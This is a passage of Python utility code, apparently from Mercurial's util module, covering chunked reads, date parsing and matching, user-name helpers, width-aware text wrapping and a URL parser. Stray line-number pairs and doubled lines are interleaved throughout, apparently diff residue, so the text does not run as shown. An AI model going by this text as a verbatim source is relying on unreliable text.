        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    # the source iterator is exhausted: return a short read
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # left < chunkremaining here, so this drives left negative
                # and terminates the while loop
                left -= chunkremaining

        return ''.join(buf)
1855
1867
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        # never request more than the remaining limit allows
        nbytes = size if limit is None else min(limit, size)
        # nbytes == 0 short-circuits without touching the file
        data = nbytes and f.read(nbytes)
        if not data:
            break
        if limit:
            limit -= len(data)
        yield data
1876
1888
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # the gap between the naive UTC and naive local renderings of the
    # same instant is exactly the local timezone offset
    localdelta = (datetime.datetime.utcfromtimestamp(timestamp) -
                  datetime.datetime.fromtimestamp(timestamp))
    return timestamp, localdelta.days * 86400 + localdelta.seconds
1889
1901
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand the %z/%1/%2 extensions into a "+HHMM"-style zone suffix
        sign = "-" if tz > 0 else "+"
        q, r = divmod(abs(tz) // 60, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    # clamp the UTC-adjusted value into the signed 32-bit range
    d = min(max(t - tz, -0x80000000), 0x7fffffff)
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    when = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    return encoding.strtolocal(when.strftime(encoding.strfromlocal(format)))
1925
1937
def shortdate(date=None):
    """Render a (timestamp, tzoff) tuple as an ISO 8601 calendar date."""
    return datestr(date, '%Y-%m-%d')
1929
1941
def parsetimezone(s):
    """Find a trailing timezone marker in ``s``.

    Returns an (offset, remainder) pair; offset is None when no
    timezone marker is recognized."""

    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = 1 if s[-5] == "+" else -1
        hours, minutes = int(s[-4:-2]), int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = 1 if s[-6] == "+" else -1
        hours, minutes = int(s[-5:-3]), int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    return None, s
1957
1969
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        found = [True for p in part if ("%"+p) in format]
        if not found:
            # field not in the format string: append the default value and
            # a matching directive; defaults[part] is a (bias, now) pair
            # indexed by the usenow flag
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    # timegm() treats the tuple as UTC, giving the wall-clock value as a
    # raw epoch number without any local-zone adjustment
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
1990
2002
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(\
                                  datetime.date.today().strftime('%b %d'))
    True
    >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
                                               datetime.timedelta(days=1)\
                                              ).strftime('%b %d'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime('%b %d')
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime('%b %d')

    try:
        # fast path: the date is already a "unixtime offset" integer pair
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # try each candidate format in order; for-else fires only when
        # none of them parsed
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2067
2079
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # round fields missing from the spec down (Jan 1st, 00:00:00)
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # round fields missing from the spec up (Dec 31st, 23:59:59);
        # probe shorter month lengths until the date parses
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except (Abort, error.ParseError):
                # parsedate rejects an invalid day-of-month (e.g. "Feb 31")
                # with error.ParseError; catching only Abort here left the
                # 30/29/28 fallback unreachable and let the error escape
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # "-N": match anything from N days ago onward
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # inclusive range between two specs
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        # a bare date matches the whole span it describes
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2143
2155
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    # Regex patterns are compiled up front so a bad pattern fails here,
    # not at first match attempt.
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    # 'literal:' only strips the prefix; any other unknown prefix is kept
    # verbatim and matched literally.
    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2202
2214
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # Drop everything from the '@' onward, then the display-name part
    # before a '<'.
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    # Finally truncate at the first space or dot, in that order.
    for stopchar in (' ', '.'):
        pos = user.find(stopchar)
        if pos >= 0:
            user = user[:pos]
    return user
2218
2230
def emailuser(user):
    """Return the user portion of an email address."""
    # Keep only what precedes the first '@'; if a '<' remains (from a
    # "Name <addr>" form), keep what follows it.
    user = user.split('@', 1)[0]
    bracket = user.find('<')
    if bracket >= 0:
        user = user[bracket + 1:]
    return user
2228
2240
def email(author):
    '''get email of author.'''
    # Slice between '<' and '>'; if '<' is absent find() yields -1 so the
    # slice starts at 0, and a missing '>' means "to end of string".
    start = author.find('<') + 1
    end = author.find('>')
    if end < 0:
        end = None
    return author[start:end]
2235
2247
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # encoding.trim is display-column aware (presumably East Asian wide
    # characters count as two columns — see encoding module).
    return encoding.trim(text, maxlength, ellipsis='...')
2239
2251
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        # Pick the first unit whose threshold (multiplier * divisor) the
        # magnitude reaches; rows are expected largest-unit first.
        magnitude = abs(count)
        for multiplier, divisor, format in unittable:
            if magnitude >= divisor * multiplier:
                return format % (count / float(divisor))
        # Nothing matched: fall back to the last (smallest) unit's format.
        return unittable[-1][2] % count

    return go
2250
2262
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    # Reject an inverted range before checking the lower bound so the
    # error messages match the doctests above.
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # Convert 1-based inclusive input to a 0-based half-open range.
    return fromline - 1, toline
2271
2283
# Human-readable byte-count renderer built on unitcountfn().  Rows are
# (multiplier, divisor, format), largest unit first: the first row whose
# threshold (multiplier * divisor) the value reaches wins, so precision
# shrinks (two decimals -> none) as the magnitude grows within a unit.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2284
2296
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    # Normalize every line ending in s to a bare LF.
    return _eolre.sub('\n', s)

def tocrlf(s):
    # Normalize every line ending in s to CRLF.
    return _eolre.sub('\r\n', s)
2295
2307
# Bind the native-EOL converters once at import time based on the
# platform line separator.
if pycompat.oslinesep == '\r\n':
    # Windows: native line ending is CRLF.
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # POSIX: LF is already native, so both directions are no-ops.
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2302
2314
def escapestr(s):
    """Return s with special characters backslash-escaped."""
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility; escape_encode returns (bytes, length).
    encoded, _length = codecs.escape_encode(s)
    return encoded
2307
2319
2308 def unescapestr(s):
2320 def unescapestr(s):
2309 return codecs.escape_decode(s)[0]
2321 return codecs.escape_decode(s)[0]
2310
2322
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2319
2331
def uirepr(s):
    # Avoid double backslash in Windows path repr()
    quoted = repr(s)
    return quoted.replace('\\\\', '\\')
2323
2335
2324 # delay import of textwrap
2336 # delay import of textwrap
def MBTextWrapper(**kwargs):
    # Factory for a width-aware TextWrapper; the subclass is created
    # lazily on first call (textwrap import is deferred) and then cached
    # by rebinding this module-level name (see bottom of function).
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr into (head, tail) so head occupies at most
            # space_left display columns per encoding.ucolwidth.
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Cache the subclass: subsequent calls of MBTextWrapper go straight
    # to tw() without redefining the class.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2427
2439
def wrap(line, width, initindent='', hangindent=''):
    # Wrap the byte string *line* to *width* display columns, decoding to
    # unicode first so per-character column widths can be used, then
    # re-encoding the result in the local encoding.
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2443
2455
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #              | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #   fp.__iter__ | buggy   | buggy           | okay
    #   fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # Read raw chunks with os.read (retrying on EINTR) and re-split
            # them into complete lines; a trailing partial line is carried
            # over in 'line' and yielded at EOF if non-empty.
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        # Regular on-disk files take the fast path (plain fp iteration);
        # only slow files (pipes, sockets, ttys) get the EINTR-safe
        # wrapper.  Non-'file' objects are assumed slow.
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2515
2527
def iterlines(iterator):
    """Yield individual lines from an iterator of text chunks.

    Line terminators are stripped by splitlines().
    """
    for chunk in iterator:
        for oneline in chunk.splitlines():
            yield oneline
2520
2532
def expandpath(path):
    """Expand environment variables, then ~user constructs, in path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2523
2535
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            # other frozen layouts (py2exe etc.): re-invoke the binary itself
            return [pycompat.sysexecutable]
    # unfrozen: defer to the platform-specific helper
    return gethgcmd()
2538
2550
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # Reap the child and remember that it exited.
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # The double condfn() check avoids a race where the child
            # satisfies the condition just before exiting.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # Always restore the previous SIGCHLD handler.
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2573
2585
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        # Let a doubled prefix stand for a literal prefix character by
        # mapping the (unescaped) prefix char to itself.
        patterns += '|' + prefix
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        mapping[prefix_char] = prefix_char
    # Match prefix followed by any known key; x.group()[1:] strips the
    # prefix character to recover the key.
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2598
2610
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # Not numeric: treat it as a service name.
        try:
            return socket.getservbyname(port)
        except socket.error:
            raise Abort(_("no port number associated with service '%s'")
                        % port)
2615
2627
# Accepted boolean spellings (lowercase), mapped to their value.
_booleans = dict.fromkeys(('1', 'yes', 'true', 'on', 'always'), True)
_booleans.update(dict.fromkeys(('0', 'no', 'false', 'off', 'never'), False))

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    # Lookup is case-insensitive; unknown spellings yield None.
    return _booleans.get(s.lower(), None)
2626
2638
2627 _hextochr = dict((a + b, chr(int(a + b, 16)))
2639 _hextochr = dict((a + b, chr(int(a + b, 16)))
2628 for a in string.hexdigits for b in string.hexdigits)
2640 for a in string.hexdigits for b in string.hexdigits)
2629
2641
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unescaped when quoting user/passwd components
    _safechars = "!~*'()+"
    # characters left unescaped when quoting path/fragment components
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                # no scheme: the whole string is a local path
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
